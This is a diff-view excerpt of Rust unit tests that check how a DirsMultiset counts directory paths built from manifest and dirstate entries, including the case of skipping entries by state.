226 assert_eq!(4, *map.get(&b"a".to_vec()).unwrap());
225 assert_eq!(1, *map.get(&b"a/b".to_vec()).unwrap());
227 assert_eq!(1, *map.get(&b"a/b".to_vec()).unwrap());
226
228
227 // but not its base's base, because it already existed
229 // but not its base's base, because it already existed
228 map.add_path(b"a/b/c/");
230 map.add_path(b"a/b/c/");
229 assert_eq!(4, *map.get(&b"a".to_vec()).unwrap());
231 assert_eq!(4, *map.get(&b"a".to_vec()).unwrap());
230 assert_eq!(2, *map.get(&b"a/b".to_vec()).unwrap());
232 assert_eq!(2, *map.get(&b"a/b".to_vec()).unwrap());
231
233
232 map.add_path(b"a/c/");
234 map.add_path(b"a/c/");
233 assert_eq!(1, *map.get(&b"a/c".to_vec()).unwrap());
235 assert_eq!(1, *map.get(&b"a/c".to_vec()).unwrap());
234
236
235 let expected = DirsMultiset {
237 let expected = DirsMultiset {
236 inner: [("", 2), ("a", 5), ("a/b", 2), ("a/b/c", 1), ("a/c", 1)]
238 inner: [("", 2), ("a", 5), ("a/b", 2), ("a/b/c", 1), ("a/c", 1)]
237 .iter()
239 .iter()
238 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
240 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
239 .collect(),
241 .collect(),
240 };
242 };
241 assert_eq!(map, expected);
243 assert_eq!(map, expected);
242 }
244 }
243
245
244 #[test]
246 #[test]
245 fn test_dirsmultiset_new_empty() {
247 fn test_dirsmultiset_new_empty() {
246 use DirsIterable::{Dirstate, Manifest};
248 use DirsIterable::{Dirstate, Manifest};
247
249
248 let new = DirsMultiset::new(Manifest(vec![]), None);
250 let new = DirsMultiset::new(Manifest(vec![]), None);
249 let expected = DirsMultiset {
251 let expected = DirsMultiset {
250 inner: HashMap::new(),
252 inner: HashMap::new(),
251 };
253 };
252 assert_eq!(expected, new);
254 assert_eq!(expected, new);
253
255
254 let new = DirsMultiset::new(Dirstate(vec![]), None);
256 let new = DirsMultiset::new(Dirstate(vec![]), None);
255 let expected = DirsMultiset {
257 let expected = DirsMultiset {
256 inner: HashMap::new(),
258 inner: HashMap::new(),
257 };
259 };
258 assert_eq!(expected, new);
260 assert_eq!(expected, new);
259 }
261 }
260
262
261 #[test]
263 #[test]
262 fn test_dirsmultiset_new_no_skip() {
264 fn test_dirsmultiset_new_no_skip() {
263 use DirsIterable::{Dirstate, Manifest};
265 use DirsIterable::{Dirstate, Manifest};
264
266
265 let input_vec = ["a/", "b/", "a/c", "a/d/"]
267 let input_vec = ["a/", "b/", "a/c", "a/d/"]
266 .iter()
268 .iter()
267 .map(|e| e.as_bytes().to_vec())
269 .map(|e| e.as_bytes().to_vec())
268 .collect();
270 .collect();
269 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
271 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
270 .iter()
272 .iter()
271 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
273 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
272 .collect();
274 .collect();
273
275
274 let new = DirsMultiset::new(Manifest(input_vec), None);
276 let new = DirsMultiset::new(Manifest(input_vec), None);
275 let expected = DirsMultiset {
277 let expected = DirsMultiset {
276 inner: expected_inner,
278 inner: expected_inner,
277 };
279 };
278 assert_eq!(expected, new);
280 assert_eq!(expected, new);
279
281
280 let input_map = ["a/", "b/", "a/c", "a/d/"]
282 let input_map = ["a/", "b/", "a/c", "a/d/"]
281 .iter()
283 .iter()
282 .map(|f| {
284 .map(|f| {
283 (
285 (
284 f.as_bytes().to_vec(),
286 f.as_bytes().to_vec(),
285 DirstateEntry {
287 DirstateEntry {
286 state: 0,
288 state: 0,
287 mode: 0,
289 mode: 0,
288 mtime: 0,
290 mtime: 0,
289 size: 0,
291 size: 0,
290 },
292 },
291 )
293 )
292 })
294 })
293 .collect();
295 .collect();
294 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
296 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
295 .iter()
297 .iter()
296 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
298 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
297 .collect();
299 .collect();
298
300
299 let new = DirsMultiset::new(Dirstate(input_map), None);
301 let new = DirsMultiset::new(Dirstate(input_map), None);
300 let expected = DirsMultiset {
302 let expected = DirsMultiset {
301 inner: expected_inner,
303 inner: expected_inner,
302 };
304 };
303 assert_eq!(expected, new);
305 assert_eq!(expected, new);
304 }
306 }
305
307
306 #[test]
308 #[test]
307 fn test_dirsmultiset_new_skip() {
309 fn test_dirsmultiset_new_skip() {
308 use DirsIterable::{Dirstate, Manifest};
310 use DirsIterable::{Dirstate, Manifest};
309
311
310 let input_vec = ["a/", "b/", "a/c", "a/d/"]
312 let input_vec = ["a/", "b/", "a/c", "a/d/"]
311 .iter()
313 .iter()
312 .map(|e| e.as_bytes().to_vec())
314 .map(|e| e.as_bytes().to_vec())
313 .collect();
315 .collect();
314 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
316 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
315 .iter()
317 .iter()
316 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
318 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
317 .collect();
319 .collect();
318
320
319 let new = DirsMultiset::new(Manifest(input_vec), Some('n' as i8));
321 let new = DirsMultiset::new(Manifest(input_vec), Some('n' as i8));
320 let expected = DirsMultiset {
322 let expected = DirsMultiset {
321 inner: expected_inner,
323 inner: expected_inner,
322 };
324 };
323 // Skip does not affect a manifest
325 // Skip does not affect a manifest
324 assert_eq!(expected, new);
326 assert_eq!(expected, new);
325
327
326 let input_map =
328 let input_map =
327 [("a/", 'n'), ("a/b/", 'n'), ("a/c", 'r'), ("a/d/", 'm')]
329 [("a/", 'n'), ("a/b/", 'n'), ("a/c", 'r'), ("a/d/", 'm')]
328 .iter()
330 .iter()
329 .map(|(f, state)| {
331 .map(|(f, state)| {
330 (
332 (
331 f.as_bytes().to_vec(),
333 f.as_bytes().to_vec(),
332 DirstateEntry {
334 DirstateEntry {
333 state: *state as i8,
335 state: *state as i8,
334 mode: 0,
336 mode: 0,
335 mtime: 0,
337 mtime: 0,
336 size: 0,
338 size: 0,
337 },
339 },
338 )
340 )
339 })
341 })
340 .collect();
342 .collect();
341
343
342 // "a" incremented with "a/c" and "a/d/"
344 // "a" incremented with "a/c" and "a/d/"
343 let expected_inner = [("", 1), ("a", 2), ("a/d", 1)]
345 let expected_inner = [("", 1), ("a", 2), ("a/d", 1)]
344 .iter()
346 .iter()
345 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
347 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
346 .collect();
348 .collect();
347
349
348 let new = DirsMultiset::new(Dirstate(input_map), Some('n' as i8));
350 let new = DirsMultiset::new(Dirstate(input_map), Some('n' as i8));
349 let expected = DirsMultiset {
351 let expected = DirsMultiset {
350 inner: expected_inner,
352 inner: expected_inner,
351 };
353 };
352 assert_eq!(expected, new);
354 assert_eq!(expected, new);
353 }
355 }
354
356
355 }
357 }